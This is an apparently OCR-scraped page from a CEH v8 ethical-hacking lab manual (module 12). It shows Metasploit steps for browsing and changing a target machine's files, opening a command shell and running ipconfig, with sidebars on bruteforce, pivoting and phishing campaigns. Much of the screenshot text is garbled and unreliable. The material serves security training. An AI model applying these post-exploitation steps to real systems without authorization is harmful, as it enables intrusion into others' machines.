(‫־‬
1

—

(‫]״‬m
etasploit
^ Y community
r
Overview

^Anilyib I ~ StwtoM Q

',/Campaigns

■ ‫־‬Web Apps
*

V I

Session 1 on 10.0.0.12

&«kn y i ‫ ׳‬aap <j—> * ‫*' *י‬
4a>Tin nt i i p 31— 'O
1
e
*
Ifim l o
no a l n

*1‫ י‬O
‫י‬
»

A c Mu
ttak o lo
d
Available Actions

(■ C lle System
‫ ג‬o ct

. Cooa JrstKr evidence ana sensitivedaii iscreenshois, passw
ords. s> irtform on)
»tem
M
o r eV erem t « e y t mandu l a ,d w l a ,and O l t H e
as i
oe i33e
pod o n o d
eee is
. u*ef»ct1u* a rem com and sn«ll onm tarcet !advanced users)
cte
m
e

‫ ״‬C1«M Piory P‫»׳‬o
t

. Ptolatacts usirtgV rem host as a gatew (TCPAJDP)
ie ote
ay
i Close V session. Furm teracaonieijuires ex lo n
bs
srm
p itatio

e2 1 - 0 2R p d I cB ‫׳‬
0 021 3i7 n e

Bruteforce uses a large
number of user name and
password combinations to
attempt to gain
access to a host. Metasploit
Pro provides preset
bruteforce profiles diat you
can use to
customize attacks for a
specific environment. If you
have a list of credentials diat
you want to
use, you can import the
credentials into the system.


•VRAPID7

FIG U R E 3.27: Metasploit Accessing Filesystem of a Target Machine

31. Y o u c a n v iew a n d m o d ify d ie files fro m d ie ta rg e t m acliin e.



M ffc fik
rtK it

If a bruteforce is successful,
Metasploit Pro opens a
session on die target system.
You can
take control of die session
dirough a command shell or
Meterpreter session. If there
is an
open session, you can collect
system data, access die
remote file system, pivot
attacks and
traffic, and run postexploitation modules.

Modules expose and exploit
vulnerabilities and security
flaws in target systems.
Metasploit
Pro offers access to a
comprehensive library of
exploit modules, auxiliary
modules, and
postexploitation modules.
You can run automated
exploits or manual exploits.

Automated exploitation uses
die minimum reliability
option to determine the set
of exploits to
run against die target
systems. You cannot select
die modules or define
evasion options diat
Metasploit Pro uses.


1M01?

PA'tptcht%m. '1,iothVdn
,ti o o » t 'p-iia
di. • f i r v
SS»C6
aM 4
lp0
St
i
yW
W
Uye
Stm
s
LStm
»ye3
82
LX
*4
P
1
L‫«־‬
&s
l
t T©
*e
n
-sa
oC
al
a
LV
i«
L
_
Ga*t
mo
Wl*
m
S
AS
tS
{ •n
*s
I
I asc
sah
st
>■»
■«
■
[■
•S
M
T
L•M
i CN
, hM
_•u
•ty
c
L*‫׳‬W
*• 9
V
_fag
ro
-n
Qw.i
baf
lx
971EIly
0DB3 t
C9 2
24
‫־‬Oal*
Ktb
M
a
□M e
Mf x
pe
W
' LRb
UH
W
PO
f*
Pfva1
rM l*
er ‫י‬
n
cre
ar
t

»
10
7
2
1
4
a
6
7
1
8
‫9גנ‬
1
2
jie
-b
s

22-03U
04194T
15930C
221552C
0--18U
1 135T
1
2--03U
00931C
15 94T
21
221552C
0--16U
1 135T
1
22-03U
00931C
15 94T
1
229821C
0--07U
10192T
2215.3U
0--1.0C
11145T
1
22-03U
0-19.7C
15 3 T
09 5
2--03U
00930C
15 94T
21
22-O.1C
0-1f3 U
15 t3 T
09 <
22915U
0-112T
10239C
2215fS7C
0--1 1T
1 14 U
1 t
22-03U
0-19* T
15 35C
09
225931C
0--00U
1019ST
22003B
0-075T
11901C
229050C
0--06U
10195T
22-O4T
0-1f30C
15 t3U
09
22-09U
00192T
1590' C
225931C
0--03U
10194T
22-01U
00195T
15914C
22-09U
00192T
15900C
22.931C
04 03U
15 94T
1
22503U
04.931C
11 •5T
1
22414U
0.011 T
1 4 ®C
1
229H2T
0-.2fl UC
10 i
1
225U7B
0-.911C
14 3T
1
?04‫מנז‬st
0 4 0 au
« ‫ .ו‬c
220SMT
O11SM
1 -0 U
C
I*2S84 U
0--26 T
1I11V
4
C

C ‫־‬f*G9
• 0I.
0

'‫־‬

p ft

i

a
(iSR1•lT1
TE | 0£.|
Oi l £I
(.SR>OT)
TE | ftf.
O1(>
L
<O;>DT
.SR |■LE
TE { E .)
E
(.SR)(.ET.)
TE | O E
OI L
E
(.SR)(•LE)
TE1DT
O1 E •
E
(.SR)(.ET.)
TE1D E
Oi L
E

J

FIG U RE 3.28: Metasploit Modifying Filesystem of a Target Macliine

32. Y o u c a n also la u n c h a c o m m a n d shell o f d ie ta rg e t m a c h in e b y clicking
C o m m a n d S h e ll fro m se ssio n s capU ired.

FIG U RE 3.29: Metasploit Launching Command Shell of Target Macliine

33. T o v iew d ie sy stem IP a d d re ss a n d o d ie r in f o rm a tio n d iro u g h d ie
c o m m a n d shell 111 M e ta sp lo it, ty p e ip c o n fig Iall a n d p ress E n te r.



Manual exploitation
provides granular control
over die exploits diat you
ran against die target
systems. You run one
exploit at a time, and you
can choose die modules and
evasion options
diat you want to use.

F IG U R E 3.30: Metasploit IP C O N F IG command for Target Machine

Social engineering exploits
client-side vulnerabilities.
You perform social
engineering through
a campaign. A campaign
uses e-mail to perform
phishing attacks against
target systems. To
create a campaign, you must
set up a web server, e-mail
account, list of target emails, and email template.

34. The following screenshot shows die IP address and other details of your
target machine.
l -‫ ־־‬n

‫־‬F !
!<■ a • Ip.
•*

U**

«U12 - KM M iniport (Vwtwork. Monitor)

k»m : « 1 H so K rrw
U 3 iero rc a ti
H rd a K 0 :0 :0 :0 :0 :0 : ‫־‬
a wre M0 0 0 0 4 0
MU
T
: « » » ?2 ‫צ‬
24« »

n tw rk A to
e o rt.ip r

In terface 13

Nw
a>

! n -Hteroiort IS T P A a te
et«
AA dp r

Meterpretcr >|

WebScan spiders web pages
and applications for active
content and forms. I f the
WebScan
identifies active content, you
can audit die content for
vulnerabilities, and dien
exploit die
vulnerabilities after
Metasploit Pro discovers
diem.


F IG U R E 3.31: Metasploit Target Machine IP Address in Metasploit Command Shell

35. Click die Go b a c k
command shell.

o n e p age

button in Metasploit browser to exit die



A task chain is a series o f
tasks that you can automate
to follow a specific schedule.
The
Metasploit W eb U I provides
an interface that you can use
to set up a task chain and an
interactive clock and
calendar diat you can use to
define die schedule.

A report provides
comprehensive results from
a penetration test. Metasploit
Pro provides
several types o f standard
reports diat range from high
level, general overviews to
detailed
report findings. You can
generate a report in PD F,
W ord, X M L , and H T M L.

F IG U R E 3.32: Metasploit closing command shell

F IG U R E 3.33: Metasploit Terminating Session
You can use reports to
compare findings between
different tests or different
systems. Reports
provide details on
compromised hosts,
executed modules, cracked
passwords, cracked SM B
hashes, discovered SSH
keys, discovered services,
collected evidence, and web
campaigns.

37. It will display Session

K illed.

Now from die A c c o u n t drop-down list, select

Logout.

I*

’7'8‫י ,ח‬
JJj AAonJsn▼
c ut ao
c

©metasploit
r community1
f Oe ie
c v rv w

r Analysis
t

~ S s io s
es n

Cma n
a pig s

WbAp
e ps

t Mdules
yo

la s
g

□ Rp r
I e ots

j Ue Sttin s
sr e g
T J L gu
- oot

Session killed

Active Sessions
Closed Sessions

E C W1
5M 1

&

•#*0 t -.Vx w8
Z r w»

wt r rt f
cepee

« 2 tM1 0 » T
l1 - S 4 e U C

Af e0 1nlo»
tn V<w
p

At c Mdle
tak ou
♦JA A^ £ _ X
V _ NVE IC

u ta ia
M m iH
F IG U R E 3.34: Metasploit Session Killed and Logging out




Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion 011
your target’s secuntv posture and exposure.

PLE A SE

TA LK

TO

Y O U R IN S T R U C T O R IF YO U
R E L A T E D TO T H IS LAB.

H A V E

Q U E ST IO N S

Tool/U tility

Information Collected/Objectives Achieved

Metasploit
Framework

Output: Interface Infomation
■ Name: etl14-M1crosoft Hyepr-v Network
Adapter
‫ י‬Hardware MAC: 00:00:00:00:00:00
■ MTU: 1500
■ IPv4 Address: 10.0.0.12
■ IPv6 Netmask: 255.255.255.0
■ IPv6 Address: fe80::b9ea:d011:3e0e:lb7
■ IPv6 Netmask: ffff:ffff:ffff:ffff:ffff::

Question
1 How would you create an initial user account from a remote system?
.
2. Describe one 01‫־‬more vulnerabilities that Metasploit can exploit.

Internet Connection Required
□ Yes

0 No

Platform Supported
0 Classroom


0 !Labs


Ceh v8 labs module 12 hacking webservers

Recommended

Recommended

More Related Content

What's hot

What's hot (18)

Viewers also liked

Viewers also liked (20)

Similar to Ceh v8 labs module 12 hacking webservers

Similar to Ceh v8 labs module 12 hacking webservers (20)

Recently uploaded

Recently uploaded (20)

Ceh v8 labs module 12 hacking webservers